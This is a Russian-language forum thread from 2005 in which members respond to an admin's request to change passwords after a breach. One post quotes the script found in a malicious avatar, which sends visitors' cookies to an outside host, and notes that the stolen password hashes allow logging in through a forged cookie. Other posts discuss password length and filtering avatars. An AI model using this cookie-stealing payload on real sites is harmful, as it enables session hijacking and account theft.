Смена паролей (официальное объявление)

[alv]

Просьба всем посетителям форума срочно сменить пароли. Причина веская, поверьте.

[polachok]

веская причина другими словами - это сперли их ?

[alv]

веская причина другими словами - это сперли их ?

↑

Возможно. Следствие ведут знатоки, к коим себя не причисляю.

[Sonic]

А подробней?

[alv]

А подробней?

↑

в модераторском разделе

[Sonic]

Да дело ИМХО не в паролях, а в куках, а если так, то, хоть заменяй пароль, хоть нет. Одно и тоже будет.

А пароль ваш не узнают, это точно!

[VN_MAClover]

Пароли узнать могут, как-то читал про утилиты, которые позволяют это сделать. Я воспользовался добрым советом и сменил.

[t.t]

Возможно. Следствие ведут знатоки, к коим себя не причисляю.

↑

Пока можно сказать только то, что не исключён вариант, что _некоторые_ пароли упёрли. Но на всякий случай...

[gray_graff]

А я в оффлайне тот документик открывал.
Или я не о том?

[Kit Fisto]

Не мог зайти под своим логином. Воспользовался востановлением пароля.

[serg_sk]

Done.

[Xenon]

А я картинки не видел.

[valeri_ufo]

а я сразу же перезашёл, чтобы кукис пропал и пароль сменил, как только увидел ... так что всегда стоит обращть внимание если происходят такие дела.

[demongloom]

ну мой пароль он только на лин форуме юзается. в основном юзаю qazwsx для быстрой регистрации на всяких сайтах. ну а в других нужных местах уже другой стоит :devil_2: .

[Sonic]

Есть ещё "пипка" снизу Удалить куки

[Lindemidux]

Я сохранил картинку аватара Linuxlamer`a.
Там был скрипт отсылки хэшей с паролями на сниффер flood3r.com/hack/sn_1/log.php
Ваши пароли даже не потребовалось бы расшифровывать, надо только Cookie создать.
Надо просто поменять Member ID
А также не использовать пароли, короче 8 символов. И желательно Буквенно-цифренные.

Lindemidux добавил в 31.05.2005 09:20

Содержимое Jpeg эксплойта:
"<script>img = new Image();
img.src = "http://flood3r.com/hack/sn_1/me.jpg?"+document.cookie;</script>"

[serg_sk]

Для Lindemidux:
Тоесть? Значит порало более восьми символов, сий эксплоит не мог умыкнуть?

[TIM]

ага ... а потом хэши и результаты работы Джонни вывесят где-нибудь в инете
(такой инцидент, не так давно, имел место быть на bsdportal.ru - мы тогда чуть одного нашего админа не потеряли ...)

Внимание!! Пожалуйста, отнеситесь серьёзнее к смене паролей - а то потом будет уже поздно !

[zenwolf]

я тоже призываю к смене паролей ,это очень СЕРЬЁЗНО ,посмотрите на пос СПЕЦИАЛИСТА - TIM -а.

Ослик_Иа ,а ты чего молчишь ?

[Sonic]

Не понял. А какая разница в длине пароля? Если он шифруется в хеш длиной 32 символа.

[Topper]

Для Lindemidux:
а ограничения по браузерам есть у этой баги?

[bogus]

а как IPB формирует этот хэш? Что-то мне подсказывает, что он использует не чистый пароль, а с какой-то секретной добавкой...

bogus добавил в 31.05.2005 10:56

Не понял. А какая разница в длине пароля? Если он шифруется в хеш длиной 32 символа.

↑

Разница в том, что короткий пароль проще подобрать.

bogus добавил в 31.05.2005 11:15

А защита, кстати говоря, видимо простая: надо жестче фильтровать код для аватаров. Или вообще разрешить использовать только картинки, загруженные сюда.

[Topper]

не-не-не!
тогда моя аватара накернится :devil_2:

[Lindemidux]

Чтобы зайти под чужим ником надо всего лишь навсего создать Cookie с вашим хэшэм.
Длинный пароль - это чтоб его нельзя было расшифровать и использовать в других местах.

[clx]

/me использует длинный пароль и не собирается его менять :P

[t.t]

/me использует длинный пароль и не собирается его менять

↑

При чём здесь длина? Если куку упёрли, то там уже готовый хеш лежит.

[Lindemidux]

Для Bogus:
Надо все существующие аватары отконвертировать в GIF, а новичкам разрешить ставить только GIF.

[zenwolf]

ой не не думайте только что написанно одним челом не может быть взломано другим .

[valeri_ufo]

не-не-не!
тогда моя аватара накернится  :devil_2:

↑

а вот что важней другим, секюрити форума или ваша аватара ?
мне секюрити ...

[Nick S. Grechukh]

При чём здесь длина? Если куку упёрли, то там уже готовый хеш лежит.

↑

что будет если в хэш еще включать ip?